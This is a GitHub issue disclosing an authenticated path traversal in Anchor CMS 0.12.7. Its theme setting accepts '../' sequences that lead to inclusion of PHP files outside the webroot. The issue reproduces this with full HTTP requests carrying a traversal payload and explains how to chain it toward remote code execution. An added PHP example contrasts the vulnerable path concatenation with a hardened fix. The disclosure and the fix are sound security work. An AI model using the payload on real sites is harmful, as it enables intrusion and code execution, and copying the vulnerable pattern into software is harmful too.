This repository has been archived by the owner on May 19, 2020. It is now read-only.

Authenticated path traversal vulnerability. #1334

Open
SecGus opened this issue Apr 23, 2020 · 0 comments


SecGus commented Apr 23, 2020

Summary

An authenticated user can use a path traversal attack (../) in the site settings page to include and run PHP files that exist outside of the webroot.

Expected Behaviour

The application should sanitize and remove all ../ in the path of the new theme to be used.

Actual Behaviour

The application takes the full name of the theme and appends it to the path of the webroot, meaning a malicious user can simply back out of the webroot and include other PHP files.

This can then be used to trigger the PHP files and achieve RCE.

Context details (if applicable)

  • Anchor version: 0.12.7
  • Server setup:
  • Reproduce:
    Go to site settings in the "extend" tab, click save and capture the request in Burp. This request should look something like:
POST /anchor/admin/extend/metadata HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 303
Origin: http://localhost
Connection: close
Referer: http://localhost/anchor/admin/extend/metadata
Cookie: editor=7drrom2i20hh2i23seuaeb4kk2; front=0v5be0e1bgvd83hrpv0n74vgoq; __stripe_mid=02362ec0-2229-452c-b85e-38e08906325a; anchorcms-install=b3urdm6glrn98b37b9hqu3hf6q; anchorcms=4bp8dlbihb77kbnrgulteak6oj
Upgrade-Insecure-Requests: 1

token=CSRF TOKEN&dashboard_page=panel&sitename=Test&description=Test&home_page=1&posts_page=1&posts_per_page=8&show_all_posts=1&auto_published_comments=1&comment_moderation_keys=asd&theme=default

We can then modify the "theme" value to be whatever file we want to include, for example:

POST /anchor/admin/extend/metadata HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 303
Origin: http://localhost
Connection: close
Referer: http://localhost/anchor/admin/extend/metadata
Cookie: editor=7drrom2i20hh2i23seuaeb4kk2; front=0v5be0e1bgvd83hrpv0n74vgoq; __stripe_mid=02362ec0-2229-452c-b85e-38e08906325a; anchorcms-install=b3urdm6glrn98b37b9hqu3hf6q; anchorcms=4bp8dlbihb77kbnrgulteak6oj
Upgrade-Insecure-Requests: 1

token=CSRF TOKEN&dashboard_page=panel&sitename=Test&description=Test&home_page=1&posts_page=1&posts_per_page=8&show_all_posts=1&auto_published_comments=1&comment_moderation_keys=asd&theme=../../../../../../../../../../../../home/user

After sending said request, we can trigger the PHP file to be run by accessing either the main page (this will run the PHP file /var/www/html/../../../../../../../../../../../../home/user/posts.php) or going to a file that doesn't exist (this will run the PHP file /var/www/html/../../../../../../../../../../../../home/user/404.php). The file names to be run are not optional as far as I can tell, but there could be a way with further investigation.

This attack can be combined with some sort of third file upload, such as an FTP, SMB or attachment upload, to achieve RCE on the remote server.
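The following is an added illustration of the fix the report asks for; it is not code from the report or from Anchor CMS. It places the pattern the report describes (the submitted theme name appended straight onto a path that is later included) beside a hardened version that allowlists the theme name, canonicalises the resolved directory and checks it stays under the themes root. The function names, the themes directory layout and the template names are assumptions made for the example.

```php
<?php
// Added example, not Anchor CMS code. Function names, directory layout and
// the fixed template list are assumptions for illustration.
declare(strict_types=1);

// Pattern the report describes: the theme name from the request is appended
// to the webroot and the result is later included, so "../" sequences in the
// name walk out of the webroot. Shown only to contrast with the fix below.
function vulnerable_theme_file(string $webroot, string $theme, string $file): string
{
    return $webroot . '/' . $theme . '/' . $file;
}

// Hardened: accept only plain directory names, then confirm the resolved
// directory is an installed theme that lives under the themes root.
function safe_theme_dir(string $themesRoot, string $theme): ?string
{
    // 1. Plain names only: no slashes, dots, NUL bytes or other separators.
    if (preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $theme) !== 1) {
        return null;
    }
    // 2. Canonicalise both paths; a missing theme directory is rejected.
    $root = realpath($themesRoot);
    $dir  = realpath($themesRoot . DIRECTORY_SEPARATOR . $theme);
    if ($root === false || $dir === false || !is_dir($dir)) {
        return null;
    }
    // 3. Defence in depth: the canonical path must still sit under the root
    //    (catches a theme directory that is a symlink pointing elsewhere).
    if (strncmp($dir, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;
    }
    return $dir;
}

// Include a theme template only after both the theme and the template name
// have been validated against fixed allowlists.
function render_theme_template(string $themesRoot, string $theme, string $template): void
{
    $allowedTemplates = ['posts.php', '404.php']; // assumed fixed template names
    $dir = safe_theme_dir($themesRoot, $theme);
    if ($dir === null || !in_array($template, $allowedTemplates, true)) {
        http_response_code(400);
        exit('invalid theme or template');
    }
    require $dir . DIRECTORY_SEPARATOR . $template;
}

// Demonstration on a temporary themes tree constructed for this example.
$tmp = sys_get_temp_dir() . '/themes_' . bin2hex(random_bytes(4));
mkdir($tmp . '/default', 0700, true);
file_put_contents($tmp . '/default/posts.php', "<?php echo 'posts template rendered', PHP_EOL;");

echo 'unsafe path built from a traversal name: ',
    vulnerable_theme_file('/var/www/html', '../../../../home/user', 'posts.php'), PHP_EOL;
echo 'installed theme accepted: ', var_export(safe_theme_dir($tmp, 'default') !== null, true), PHP_EOL;
echo 'traversal name accepted:  ', var_export(safe_theme_dir($tmp, '../../../../home/user') !== null, true), PHP_EOL;
echo 'unknown theme accepted:   ', var_export(safe_theme_dir($tmp, 'missing') !== null, true), PHP_EOL;
render_theme_template($tmp, 'default', 'posts.php');

unlink($tmp . '/default/posts.php');
rmdir($tmp . '/default');
rmdir($tmp);
```

The allowlist regex alone already blocks the `../` payload from the report; the `realpath` prefix check is kept so that a theme directory which is itself a symlink cannot redirect the include outside the themes tree.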
